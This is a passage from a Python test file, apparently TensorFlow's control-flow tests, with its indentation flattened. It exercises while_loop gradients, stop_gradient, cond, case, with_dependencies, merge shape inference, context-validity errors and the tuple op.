@test_util.run_deprecated_v1
def testWhileAndTensorArray(self):
with self.cached_session() as sess:
param = constant_op.constant(2.0)
n0 = constant_op.constant(0)
y0 = constant_op.constant([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], name="elems")
def c(i, _):
return i < 10
def b(i, y):
return [
i + 1,
functional_ops.map_fn(lambda x: math_ops.multiply(x, param), y)
]
r = control_flow_ops.while_loop(c, b, [n0, y0], parallel_iterations=1)
r = gradients_impl.gradients(r, param)[0]
self.assertAllClose(107520.0, self.evaluate(r))
@test_util.run_deprecated_v1
def testNestedWhileAndTensorArray(self):
n = constant_op.constant(3.0)
def Body(row, ta, n):
def InnerBody(row, col, ta, n):
# Note: row and col are 1-based.
ta = ta.write(
math_ops.cast(n * (row - 1.) + col - 1., dtypes.int32), row * col)
return row, col + 1., ta, n
# TODO(b/118457764): Remove n from loop_vars from both loops once fixed.
ta = control_flow_ops.while_loop(
lambda _, col, _1, n: col <= n,
InnerBody, [row, constant_op.constant(1.), ta, n],
return_same_structure=False)[2]
return row + 1., ta, n
ta = tensor_array_ops.TensorArray(dtype=dtypes.float32, size=9)
ta = control_flow_ops.while_loop(
lambda row, _, _1: row <= n,
Body, [constant_op.constant(1.), ta, n],
return_same_structure=False)[1]
output = array_ops.reshape(ta.stack(), [3, 3])
self.assertAllEqual(
self.evaluate(output), [[1., 2., 3.], [2., 4., 6.], [3., 6., 9.]])
# TODO(b/117675481): This does not work with current TA. Enable with new TA.
# grad = gradients_impl.gradients(output, [n])
# self.assertEqual(self.evaluate(grad), 3.5)
@test_util.run_deprecated_v1
def testWhileGrad_StopGrad(self):
with self.cached_session():
x = constant_op.constant(3.0, name="x")
y = constant_op.constant(2.0, name="y")
c = lambda x, y: math_ops.less(x, 100.0)
def b(x, y):
y1 = math_ops.square(y)
x1 = math_ops.add(math_ops.square(x), y1)
return x1, y1
rx, ry = control_flow_ops.while_loop(c, b, [x, y])
r = gradients_impl.gradients(rx, y)[0]
self.assertEqual(136.0, self.evaluate(r))
r = gradients_impl.gradients(ry, y)[0]
self.assertEqual(32.0, self.evaluate(r))
r = gradients_impl.gradients(array_ops.stop_gradient(rx), y)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(array_ops.stop_gradient(ry), y)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(
array_ops.stop_gradient(math_ops.square(rx)), y)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(
array_ops.stop_gradient(math_ops.add(rx, ry)), x)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(
array_ops.stop_gradient(math_ops.add(rx, ry)), y)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(math_ops.add(rx, ry), y)[0]
self.assertEqual(168.0, self.evaluate(r))
r = gradients_impl.gradients(
math_ops.add(rx, array_ops.stop_gradient(ry)), y)[0]
self.assertEqual(136.0, self.evaluate(r))
r = gradients_impl.gradients(
math_ops.add(array_ops.stop_gradient(rx), ry), y)[0]
self.assertEqual(32.0, self.evaluate(r))
@test_util.run_deprecated_v1
@test_util.disable_control_flow_v2("b/118712257")
def testWhileGrad_StopGradInside(self):
with self.cached_session():
x = constant_op.constant(3.0, name="x")
y = constant_op.constant(2.0, name="y")
c = lambda x, y: math_ops.less(x, 100.0)
def b(x, y):
y1 = array_ops.stop_gradient(math_ops.square(y))
x1 = math_ops.add(math_ops.square(x), y1)
return x1, y1
rx, _ = control_flow_ops.while_loop(c, b, [x, y])
r = gradients_impl.gradients(rx, y)[0]
self.assertAllClose(0.0, self.evaluate(r))
r = gradients_impl.gradients(rx, x)[0]
self.assertAllClose(156.0, self.evaluate(r))
@test_util.run_deprecated_v1
@test_util.disable_control_flow_v2("b/118712257")
def testWhileGrad_StopGradInsideNoShape(self):
with self.cached_session() as sess:
x = array_ops.placeholder(dtypes.float32)
y = array_ops.placeholder(dtypes.float32)
c = lambda x, y: math_ops.less(math_ops.reduce_sum(x), 100.0)
def b(x, y):
y1 = array_ops.stop_gradient(math_ops.square(y, name="stopped"))
x1 = math_ops.add(math_ops.square(x), y1)
return x1, y1
rx, _ = control_flow_ops.while_loop(c, b, [x, y])
r = gradients_impl.gradients(rx, y)[0]
feed_dict = {x: [3.0, 4.0], y: [2.0, 3.0]}
self.assertAllClose([0.0, 0.0], sess.run(r, feed_dict=feed_dict))
r = gradients_impl.gradients(rx, x)[0]
self.assertAllClose([156.0, 400.0], sess.run(r, feed_dict=feed_dict))
name = "gradients/while/stopped_grad"
all_ops = x.graph.get_operations()
self.assertFalse(any(name in op.name for op in all_ops))
@test_util.disable_control_flow_v2("b/117954949")
@test_util.run_deprecated_v1
def testWhileGradGradFail(self):
theta = variables.Variable(initial_value=1.)
def fn(prev, x):
return prev + x * theta
result = functional_ops.scan(fn, np.array([1., 2., 3.], dtype=np.float32))
grad_theta = gradients_impl.gradients(result, theta)
if not control_flow_util.ENABLE_CONTROL_FLOW_V2:
with self.assertRaisesRegexp(TypeError, "Second-order gradient"):
gradients_impl.gradients(grad_theta, theta)
grad_theta_stopped = array_ops.stop_gradient(grad_theta)
gradients_impl.gradients(grad_theta_stopped, theta)
@test_util.run_deprecated_v1
def testStopGradOnWhileGrad(self):
with self.cached_session():
x = constant_op.constant(2.0, name="x")
y = constant_op.constant(2.0, name="y")
c = lambda x: math_ops.less(x, 100.0)
b = lambda x: math_ops.multiply(x, y)
rx = control_flow_ops.while_loop(c, b, [x])
rg = gradients_impl.gradients(rx, y)[0]
rg = array_ops.stop_gradient(rg)
r = math_ops.add(math_ops.square(y), rx)
r = math_ops.add(r, rg)
r = gradients_impl.gradients(r, y)[0]
self.assertEqual(388.0, self.evaluate(r))
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
@test_util.run_deprecated_v1
def testWhileGradientWithNontrainablePath1(self):
q = variables.Variable([7., 8.])
def cond(_, y):
del y
return False
def body(x, _):
return x, math_ops.cast(x, dtypes.float32) + math_ops.reduce_sum(q)
_, y = control_flow_ops.while_loop(cond, body, (math_ops.argmin(q), 0.))
dy_dq, = gradients_impl.gradients(y, q)
self.assertIsNotNone(dy_dq)
with self.cached_session() as sess:
self.evaluate(q.initializer)
self.assertAllClose([0., 0.], self.evaluate(dy_dq))
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
@test_util.run_v1_only("b/120545219")
def testWhileGradientWithNontrainablePath2(self):
q = variables.Variable([7., 8.])
def cond(_, y):
return math_ops.equal(y, 0.)
def body(x, _):
zero = constant_op.constant(0, dtype=dtypes.int64)
return zero, math_ops.cast(x, dtypes.float32) + math_ops.reduce_sum(q)
_, y = control_flow_ops.while_loop(cond, body, (math_ops.argmin(q), 0.))
dy_dq, = gradients_impl.gradients(y, q)
self.assertIsNotNone(dy_dq)
with self.cached_session() as sess:
self.evaluate(q.initializer)
self.assertAllClose([1., 1.], self.evaluate(dy_dq))
@test_util.disable_control_flow_v2("b/115920078 (gradients)")
@test_util.run_v1_only("b/120545219")
def testIssue16504(self):
c = constant_op.constant(np.arange(100), dtype=dtypes.float32)
w = variables.Variable(
initial_value=np.ones(100), dtype=dtypes.float32) / 100
k = variables.Variable(0, dtype=dtypes.int32)
chg_w = constant_op.constant(np.inf, dtype=dtypes.float32)
def cond(k, _, chg_w):
return math_ops.logical_and(k < 10, chg_w > 1e-3)
def body(k, w, chg_w):
grad, = gradients_impl.gradients(-math_ops.reduce_sum(w * c), w)
w_n = w * math_ops.exp(-0.1 * grad)
w_n /= math_ops.reduce_sum(w_n)
chg_w = (
math_ops.reduce_sum(math_ops.abs(w_n - w)) / math_ops.reduce_sum(
math_ops.abs(w)))
return k + 1, w_n, chg_w
_, w, _ = control_flow_ops.while_loop(cond, body, [k, w, chg_w])
grad, = gradients_impl.gradients(w, c)
self.assertIsNotNone(grad)
@test_util.run_v1_only("b/120545219")
def testStopGradMultiFlows(self):
with self.cached_session():
def body(i, y, r):
x = variable_scope.get_variable(
"x",
shape=(),
dtype=dtypes.float32,
initializer=init_ops.ones_initializer())
y *= x
return [i + 1, y, r + math_ops.reduce_sum(y)]
i0 = constant_op.constant(0)
y0 = array_ops.ones(5)
r0 = constant_op.constant(0.0)
cond = lambda i, y, r: i < 1
_, _, r = control_flow_ops.while_loop(
cond, body, [i0, y0, r0], back_prop=True)
vars_ = variables.global_variables()
grads = linalg_ops.norm(gradients_impl.gradients(r, vars_)[0])
z = math_ops.add(r, array_ops.stop_gradient(math_ops.reduce_sum(grads)))
result = gradients_impl.gradients(z, vars_)[0]
self.evaluate(variables.global_variables_initializer())
self.assertEqual(5.0, self.evaluate(result))
@test_util.run_v1_only("b/120545219")
def testOneValueCond(self):
with self.cached_session():
c = array_ops.placeholder(dtypes.int32, shape=[])
one = ops.convert_to_tensor(1, name="one")
two = ops.convert_to_tensor(2, name="two")
p = math_ops.greater_equal(c, 1)
i = control_flow_ops.cond(p, lambda: one, lambda: two)
self.assertTrue(isinstance(i, ops.Tensor))
# True case: c = 2 is >= 1
self.assertEqual([1], i.eval(feed_dict={c: 2}))
# False case: c = 0 is not >= 1
self.assertEqual([2], i.eval(feed_dict={c: 0}))
@test_util.run_deprecated_v1
def testExampleCond(self):
with self.cached_session():
x = ops.convert_to_tensor([-2.0, 2.0], name="x")
d = array_ops.placeholder(dtypes.int32, shape=[])
def l2():
return math_ops.sqrt(math_ops.reduce_sum(math_ops.square(x)))
def l1():
return math_ops.reduce_sum(math_ops.abs(x))
i = control_flow_ops.cond(math_ops.equal(d, 2), l2, l1)
self.assertAllClose(4.0, i.eval(feed_dict={d: 1}))
self.assertAllClose(2.0 * math.sqrt(2), i.eval(feed_dict={d: 2}))
@test_util.run_v1_only("b/120545219")
def testCase(self):
with self.cached_session():
x = constant_op.constant(1)
y = constant_op.constant(2)
z = constant_op.constant(3)
f1 = lambda: constant_op.constant(17)
f2 = lambda: constant_op.constant(23)
f3 = lambda: constant_op.constant(-1)
r1 = control_flow_ops.case(
{
x < y: f1,
x > z: f2
}, default=f3, exclusive=True)
self.assertAllEqual(r1, 17)
r2 = control_flow_ops.case([(y > z, f1), (y > x, f2)], default=f3)
self.assertAllEqual(r2, 23)
# Duplicate events can happen, first one is selected
r3 = control_flow_ops.case([(x < y, f1), (x < y, f2)], default=f3)
self.assertAllEqual(r3, 17)
# Duplicate events cause an error if exclusive = True
r4 = control_flow_ops.case(
[(x < y, f1), (x < y, f2)], default=f3, exclusive=True)
with self.assertRaisesOpError("Input error:"):
self.evaluate(r4)
# Check that the default is called if none of the others are
r5 = control_flow_ops.case({x > y: f1}, default=f3)
self.assertAllEqual(r5, -1)
ran_once = [False, False, False]
def break_run_twice(ix):
def _break():
ran_once[ix] = True
return constant_op.constant(ix)
return _break
# Should not fail - each conditional gets called exactly once
# except default. Default gets called twice: once to create an
# empty output and once for the actual cond switch.
r6 = control_flow_ops.case(
[(x < y, break_run_twice(0)), (x > y, break_run_twice(1))],
default=lambda: constant_op.constant(2))
self.assertAllEqual(r6, 0)
@test_util.run_v1_only("b/120545219")
def testCaseSideEffects(self):
with self.cached_session() as sess:
v0 = variables.Variable(-1)
v1 = variables.Variable(-1)
v2 = variables.Variable(-1)
a = lambda: control_flow_ops.with_dependencies([state_ops.assign(v0, 0)], 0)
b = lambda: control_flow_ops.with_dependencies([state_ops.assign(v1, 1)], 1)
c = lambda: control_flow_ops.with_dependencies([state_ops.assign(v2, 2)], 2)
x = constant_op.constant(1)
y = constant_op.constant(2)
r0 = control_flow_ops.case(
((x < y, a), (x > y, b)), default=c, exclusive=True)
r1 = control_flow_ops.case(
((x > y, a), (x < y, b)), default=c, exclusive=True)
r2 = control_flow_ops.case(
((x > y, a), (x > y, b)), default=c, exclusive=True)
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual(self.evaluate([v0, v1, v2]), [-1] * 3)
self.assertEqual(2, self.evaluate(r2))
self.assertAllEqual(self.evaluate([v0, v1, v2]), [-1, -1, 2])
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual(self.evaluate([v0, v1, v2]), [-1] * 3)
self.assertEqual(1, self.evaluate(r1))
self.assertAllEqual(self.evaluate([v0, v1, v2]), [-1, 1, -1])
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual(self.evaluate([v0, v1, v2]), [-1] * 3)
self.assertEqual(0, self.evaluate(r0))
self.assertAllEqual(self.evaluate([v0, v1, v2]), [0, -1, -1])
@test_util.disable_control_flow_v2("b/113324949 (ref vars)")
@test_util.run_v1_only("b/120545219")
def testOneOpCond(self):
with self.cached_session():
v = variables.Variable(0)
c = ops.convert_to_tensor(0)
one = ops.convert_to_tensor(1)
two = ops.convert_to_tensor(2)
p = math_ops.greater_equal(c, 1)
def a():
return state_ops.assign(v, one)
def b():
return state_ops.assign(v, two)
i = control_flow_ops.cond(p, a, b)
self.assertTrue(isinstance(i, ops.Tensor))
self.evaluate(variables.global_variables_initializer())
self.assertEqual(0, self.evaluate(v))
# True case: c = 2 is >= 1, v is set to 1.
self.assertEqual(1, i.eval(feed_dict={c.name: 2}))
self.assertEqual(1, self.evaluate(v))
# False case: c = 0 is not >= 1, v is set to 2.
self.assertEqual(2, i.eval(feed_dict={c.name: 0}))
self.assertEqual(2, self.evaluate(v))
@test_util.run_v1_only("b/120545219")
def testWithOpsDependencies(self):
with self.cached_session() as sess:
v = variables.VariableV1(0.0)
c = constant_op.constant(10)
# Fetching v directly will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
self.evaluate([c, v])
# Use a control dependency to ensure init_variable is run
# while asking for c
real_v = control_flow_ops.with_dependencies(
name="real_tensor",
output_tensor=v._ref(), # pylint: disable=protected-access
dependencies=[v.initializer])
c_val, real_v_val = self.evaluate([c, real_v])
# Ensure the result of 'real_c' is the same as 'c'
self.assertAllEqual(10, c_val)
# Ensure that 'v' is initialized
self.assertAllClose(0.0, real_v_val)
@test_util.run_v1_only("b/120545219")
def testWithTensorDependencies(self):
with self.cached_session():
v = variables.VariableV1(0.0)
c1 = constant_op.constant(10)
c2 = constant_op.constant(20)
# c1_with_init_v depends on the init op for v
c1_with_init_v = control_flow_ops.with_dependencies(
name="c1_with_init_v", output_tensor=c1, dependencies=[v.initializer])
# c2_with_c1 depends on the value of c1_with_init_v
c2_with_c1_dep = control_flow_ops.with_dependencies(
name="c2_with_c1_dep",
output_tensor=c2,
dependencies=[c1_with_init_v])
# Fetching v directly will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
self.evaluate(v)
# Get the value of 'c2_with_c1_dep', which should cause 'v'
# to be initialized.
self.assertAllEqual(20, self.evaluate(c2_with_c1_dep))
# Ensure that 'v' is initialized
self.assertAllClose(0.0, self.evaluate(v))
@test_util.run_v1_only("b/120545219")
def testWithIndexedSlicesDependencies(self):
with self.cached_session():
v = variables.VariableV1(
np.array([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]]).astype(np.float32))
v_at_1 = ops.IndexedSlices(v, constant_op.constant([1]))
gather_v_at_1 = array_ops.gather(v_at_1.values, v_at_1.indices)
v_at_1_after_init = control_flow_ops.with_dependencies([v.initializer],
v_at_1)
gather_v_at_1_after_init = array_ops.gather(v_at_1_after_init.values,
v_at_1_after_init.indices)
# Fetching gather_v_at_1 will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
self.evaluate(gather_v_at_1)
# Getting gather_v_at_1_after_init will work, and initialize v.
self.assertAllEqual([[10.0, 11.0]],
self.evaluate(gather_v_at_1_after_init))
# Double check that 'v' is initialized
self.assertAllClose([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]],
self.evaluate(v))
def testDependenciesDevice(self):
with ops.Graph().as_default():
# device set on tensor => same device on dep.
with ops.device("/job:ps"):
vd = variables.VariableV1([0.0])
with_vd_dep = control_flow_ops.with_dependencies([vd.initializer], vd)
self.assertTrue("/job:ps" in with_vd_dep.device)
# No device set on tensor => no device on dep.
vnod = variables.VariableV1([0.0])
with_vnod_dep = control_flow_ops.with_dependencies([vnod.initializer],
vnod)
self.assertDeviceEqual(None, with_vnod_dep.device)
# device set on tensor, default device on graph => default device on dep.
vdef = variables.VariableV1([0.0], name="vdef")
with ops.device("/job:worker/device:GPU:1"):
with_vdef_dep = control_flow_ops.with_dependencies([vdef.initializer],
vdef)
# The device is empty, but the colocation constraint is set.
self.assertDeviceEqual("", with_vdef_dep.device)
self.assertEqual([b"loc:@vdef"], with_vdef_dep.op.colocation_groups())
@test_util.run_v1_only("b/120545219")
def testGroup(self):
with self.cached_session() as sess:
v1 = variables.VariableV1([0.0])
v2 = variables.VariableV1([1.0])
# Group init1 and init2 and run.
init = control_flow_ops.group(v1.initializer, v2.initializer)
# Fetching v1 directly will result in an uninitialized error
with self.assertRaisesOpError("Attempting to use uninitialized value"):
self.evaluate(v1)
# Runs "init" before fetching v1 and v2.
init.run()
v1_val, v2_val = self.evaluate([v1, v2])
# Ensure that v1 and v2 are initialized
self.assertAllClose([0.0], v1_val)
self.assertAllClose([1.0], v2_val)
@test_util.run_v1_only("b/120545219")
def testGroupEmpty(self):
op = control_flow_ops.group()
self.assertEqual(op.type, "NoOp")
self.assertEqual(op.control_inputs, [])
@test_util.run_deprecated_v1
def testMergeShapes(self):
# All inputs unknown.
p1 = array_ops.placeholder(dtypes.float32)
p2 = array_ops.placeholder(dtypes.float32)
p3 = array_ops.placeholder(dtypes.float32)
m, index = control_flow_ops.merge([p1, p2, p3])
self.assertIs(None, m.get_shape().ndims)
self.assertEqual([], index.get_shape())
# All inputs known with different ranks.
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[1, 2, 3])
m, index = control_flow_ops.merge([p1, p2])
self.assertIs(None, m.get_shape().ndims)
self.assertEqual([], index.get_shape())
# All inputs known with some dimensions different.
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[2, 1])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, None], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[None, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[2, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
# All inputs known with same dimensions.
p1 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[1, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([1, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = array_ops.placeholder(dtypes.float32, shape=[None, 2])
p2 = array_ops.placeholder(dtypes.float32, shape=[None, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = array_ops.placeholder(dtypes.float32, shape=[None, None])
p2 = array_ops.placeholder(dtypes.float32, shape=[None, None])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, None], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
@test_util.run_v1_only("b/120545219")
def testRefSelect(self):
index = array_ops.placeholder(dtypes.int32)
# All inputs unknown.
p1 = array_ops.placeholder(dtypes.float32)
p2 = array_ops.placeholder(dtypes.float32)
p3 = array_ops.placeholder(dtypes.float32)
v1 = variables.VariableV1(p1, validate_shape=False)
v2 = variables.VariableV1(p2, validate_shape=False)
v3 = variables.VariableV1(p3, validate_shape=False)
self.assertIs(None, v1.get_shape().ndims)
s = control_flow_ops.ref_select(index, [v1, v2, v3])
self.assertIs(None, s.get_shape().ndims)
# All inputs known but different.
v1 = variables.VariableV1([[1, 2]])
v2 = variables.VariableV1([[2], [1]])
s = control_flow_ops.ref_select(index, [v1, v2])
self.assertIs(None, s.get_shape().ndims)
# All inputs known and same.
v1 = variables.VariableV1([[1, 2]])
v2 = variables.VariableV1([[1, 2]])
s = control_flow_ops.ref_select(index, [v1, v2])
self.assertEqual([1, 2], s.get_shape())
# Possibly the same but not guaranteed.
v1 = variables.VariableV1([[1., 2.]])
p2 = array_ops.placeholder(dtypes.float32, shape=[None, 2])
v2 = variables.VariableV1(p2, validate_shape=False)
s = control_flow_ops.ref_select(index, [v1, v2])
self.assertEqual(None, s.get_shape())
@test_util.run_deprecated_v1
def testRunLoopTensor(self):
with self.cached_session() as sess:
tensor_list = []
def condition(t):
return t < constant_op.constant(5)
def body(_):
tensor_list.append(constant_op.constant(5))
return constant_op.constant(10)
result = control_flow_ops.while_loop(condition, body,
[constant_op.constant(4)])
self.assertEqual(10, self.evaluate(result))
# Ensure that we cannot run a tensor that escapes the loop body
# accidentally.
with self.assertRaises(ValueError):
sess.run(tensor_list[0])
@test_util.run_v1_only("b/120545219")
def testWhilePyFuncBasic(self):
def func(x):
return np.square(x)
with self.cached_session():
r = control_flow_ops.while_loop(
lambda i, v: i < 4,
lambda i, v: [i + 1, script_ops.py_func(func, [v], [dtypes.float32])[0]],
[constant_op.constant(0), constant_op.constant(2.0, dtypes.float32)],
[tensor_shape.unknown_shape(), tensor_shape.unknown_shape()])
self.assertEqual(self.evaluate(r[1]), 65536.0)
@test_util.run_v1_only("b/120545219")
def testWhileFuncBasic(self):
@function.Defun(dtypes.float32)
def func(x):
return math_ops.square(math_ops.square(x))
with self.cached_session():
x = constant_op.constant(2.0, dtypes.float32)
r = control_flow_ops.while_loop(
lambda i, v: i < 2, lambda i, v: [i + 1, func(v)],
[constant_op.constant(0), x],
[tensor_shape.unknown_shape(),
tensor_shape.unknown_shape()])
grad = gradients_impl.gradients(r, x)[0]
self.assertEqual(self.evaluate(r[1]), 65536.0)
self.assertEqual(self.evaluate(grad), 524288.0)
# while_v2 does not have stacks.
if not control_flow_util.ENABLE_CONTROL_FLOW_V2:
self.assertEqual(
len([op for op in x.graph.get_operations() if op.type == "StackV2"
]), 1)
@test_util.run_v1_only("b/120545219")
def testQIntSwitchMerge(self):
with self.cached_session(force_gpu=test.is_gpu_available()) as sess:
constant_qint = constant_op.constant(np.array([42]), dtypes.qint8)
cond = constant_op.constant(True, dtypes.bool)
v_f, v_t = control_flow_ops.switch(constant_qint, cond)
result = control_flow_ops.merge([v_f, v_t])
self.evaluate(result)
@test_util.run_v1_only("b/120545219")
def testQIntRefSwitchMerge(self):
with self.cached_session(use_gpu=test.is_gpu_available()) as sess:
var_qint = gen_state_ops.variable(
shape=[1], dtype=dtypes.qint8, name="v", container="", shared_name="")
assign_op = state_ops.assign(
var_qint, constant_op.constant(np.array([42]), dtypes.qint8))
self.evaluate(assign_op)
cond = constant_op.constant(True, dtypes.bool)
v_f, v_t = control_flow_ops.ref_switch(var_qint, cond)
result = control_flow_ops.ref_merge([v_f, v_t])
self.evaluate(result)
@test_util.run_v1_only("b/120545219")
def testUInt64SwitchMerge(self):
with self.cached_session(force_gpu=test.is_gpu_available()) as sess:
constant_uint64 = constant_op.constant(np.array([42]), dtypes.uint64)
cond = constant_op.constant(True, dtypes.bool)
v_f, v_t = control_flow_ops.switch(constant_uint64, cond)
result = control_flow_ops.merge([v_f, v_t])
self.evaluate(result)
@test_util.run_deprecated_v1
def testQIntArgAndRet(self):
@function.Defun(dtypes.qint8)
def func(x):
return x
with self.cached_session(force_gpu=test.is_gpu_available()) as sess:
qint = constant_op.constant(np.array([42]), dtypes.qint8)
result = func(qint)
self.evaluate(result)
class ControlFlowContextCheckTest(test.TestCase):
def _getWhileTensor(self):
"""Creates and returns a tensor from a while context."""
tensor = []
def body(i):
if not tensor:
tensor.append(constant_op.constant(1))
return i + tensor[0]
control_flow_ops.while_loop(lambda i: i < 10, body, [0])
return tensor[0]
def _getCondTensor(self):
cond_tensor = []
def true_fn():
if not cond_tensor:
cond_tensor.append(constant_op.constant(1))
return cond_tensor[0]
control_flow_ops.cond(
math_ops.less(1, 2), true_fn, lambda: constant_op.constant(0))
return cond_tensor[0]
@test_util.run_v1_only("b/120545219")
def testInvalidContext(self):
# Accessing a while loop tensor outside of control flow is illegal.
while_tensor = self._getWhileTensor()
with self.assertRaisesRegexp(
ValueError,
"Cannot use 'while/Const_1' as input to 'Add' because 'while/Const_1' "
"is in a while loop. See info log for more details."):
math_ops.add(1, while_tensor)
@test_util.run_v1_only("b/120545219")
def testInvalidContextInCond(self):
# Accessing a while loop tensor in cond is illegal.
while_tensor = self._getWhileTensor()
with self.assertRaisesRegexp(
ValueError, "Cannot use 'while/Const_1' as input to 'cond/Add' because "
"'while/Const_1' is in a while loop. See info log for more details."):
# TODO(skyewm): this passes if we return while_tensor directly instead
# of using it as input to another op.
control_flow_ops.cond(
math_ops.less(1, 2), lambda: math_ops.add(1, while_tensor),
lambda: constant_op.constant(0))
@test_util.run_v1_only("b/120545219")
def testInvalidContextInWhile(self):
# Accessing a while loop tensor in a different while loop is illegal.
while_tensor = self._getWhileTensor()
with self.assertRaisesRegexp(
ValueError,
"Cannot use 'while_1/Add' as input to 'while/Const_1' because they are "
"in different while loops. See info log for more details."):
control_flow_ops.while_loop(lambda i: i < 10,
lambda x: math_ops.add(1, while_tensor), [0])
with self.assertRaisesRegexp(
ValueError,
"Cannot use 'while_2/NextIteration' as input to 'while/Const_1' "
"because they are in different while loops. See info log for more "
"details."):
control_flow_ops.while_loop(lambda i: i < 10, lambda i: while_tensor, [0])
def testValidCondContext(self):
# Accessing a tensor from a cond context is OK (although dangerous).
cond_tensor = self._getCondTensor()
math_ops.add(1, cond_tensor)
def testValidCondContextBranches(self):
# Accessing a tensor from a cond context from the other branch's cond
# context is OK (although dangerous).
cond_tensor = []
def branch_fn():
if not cond_tensor:
cond_tensor.append(constant_op.constant(1))
return cond_tensor[0]
control_flow_ops.cond(math_ops.less(1, 2), branch_fn, branch_fn)
@test_util.run_v1_only("b/120545219")
def testValidWhileContext(self):
# Accessing a tensor in a nested while is OK.
def body(_):
c = constant_op.constant(1)
return control_flow_ops.while_loop(lambda i: i < 3, lambda i: i + c, [0])
control_flow_ops.while_loop(lambda i: i < 5, body, [0])
@test_util.run_v1_only("b/120545219")
def testValidNestedContexts(self):
# Accessing a tensor from a cond context in a while context, all inside an
# outer while context, is OK.
def body(_):
cond_tensor = self._getCondTensor()
# Create another cond containing the while loop for good measure
return control_flow_ops.cond(
math_ops.less(1, 2),
lambda: control_flow_ops.while_loop(lambda i: i < 3,
lambda i: i + cond_tensor, [0]),
lambda: constant_op.constant(0))
control_flow_ops.while_loop(lambda i: i < 5, body, [0])
@test_util.run_v1_only("b/120545219")
def testInvalidNestedContexts(self):
# Accessing a tensor from a while context in a different while context, all
# inside a cond context, is illegal.
def true_fn():
while_tensor = self._getWhileTensor()
return control_flow_ops.while_loop(lambda i: i < 3,
lambda i: i + while_tensor, [0])
with self.assertRaisesRegexp(
ValueError,
"Cannot use 'cond/while_1/add' as input to 'cond/while/Const_1' because"
" they are in different while loops. See info log for more details."):
control_flow_ops.cond(
math_ops.less(1, 2), true_fn, lambda: constant_op.constant(0))
class TupleTest(test.TestCase):
@test_util.run_v1_only("b/120545219")
def testTensors(self):
for v1_first in [True, False]:
with self.cached_session():
v1 = variables.VariableV1([1.0])
add1 = math_ops.add(
control_flow_ops.with_dependencies([v1.initializer], v1._ref()), # pylint: disable=protected-access
2.0)
v2 = variables.VariableV1([10.0])
add2 = math_ops.add(
control_flow_ops.with_dependencies([v2.initializer], v2._ref()), # pylint: disable=protected-access
20.0)
t1, _, t2 = control_flow_ops.tuple([add1, None, add2])
# v1 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
self.evaluate(v1)
# v2 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
self.evaluate(v2)
if v1_first:
# Getting t1 initializes v2.
self.assertAllClose([3.0], self.evaluate(t1))
self.assertAllClose([10.0], self.evaluate(v2))
else:
# Getting t2 initializes v1.
self.assertAllClose([30.0], self.evaluate(t2))
self.assertAllClose([1.0], self.evaluate(v1))
@test_util.run_v1_only("b/120545219")
def testIndexedSlices(self):
for v1_first in [True, False]:
with self.cached_session():
v1 = variables.VariableV1(
np.array([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]]).astype(
np.float32))
v1_at_1 = ops.IndexedSlices(
control_flow_ops.with_dependencies([v1.initializer], v1._ref()), # pylint: disable=protected-access
constant_op.constant([1]))
v2 = variables.VariableV1(
np.array([[0.1, 1.1], [10.1, 11.1], [20.1, 21.1]]).astype(
np.float32))
v2_at_1 = ops.IndexedSlices(
control_flow_ops.with_dependencies([v2.initializer], v2._ref()), # pylint: disable=protected-access
constant_op.constant([1]))
st1, st2 = control_flow_ops.tuple([v1_at_1, v2_at_1])
g1 = array_ops.gather(st1.values, st1.indices)
g2 = array_ops.gather(st2.values, st2.indices)
# v1 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
self.evaluate(v1)
# v2 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
self.evaluate(v2)
if v1_first:
# Getting g1 initializes v2.
self.assertAllClose([[10.0, 11.0]], self.evaluate(g1))
self.assertAllClose([[0.1, 1.1], [10.1, 11.1], [20.1, 21.1]],
self.evaluate(v2))
else:
# Getting g2 initializes v1.
self.assertAllClose([[10.1, 11.1]], self.evaluate(g2))
self.assertAllClose([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]],
self.evaluate(v1))
def testAcceptTensorsAsControlInputs(self):
with self.cached_session():
var = variables.VariableV1(0)
assign = state_ops.assign(var, 1)
t, = control_flow_ops.tuple(
[constant_op.constant(0)], control_inputs=[assign])
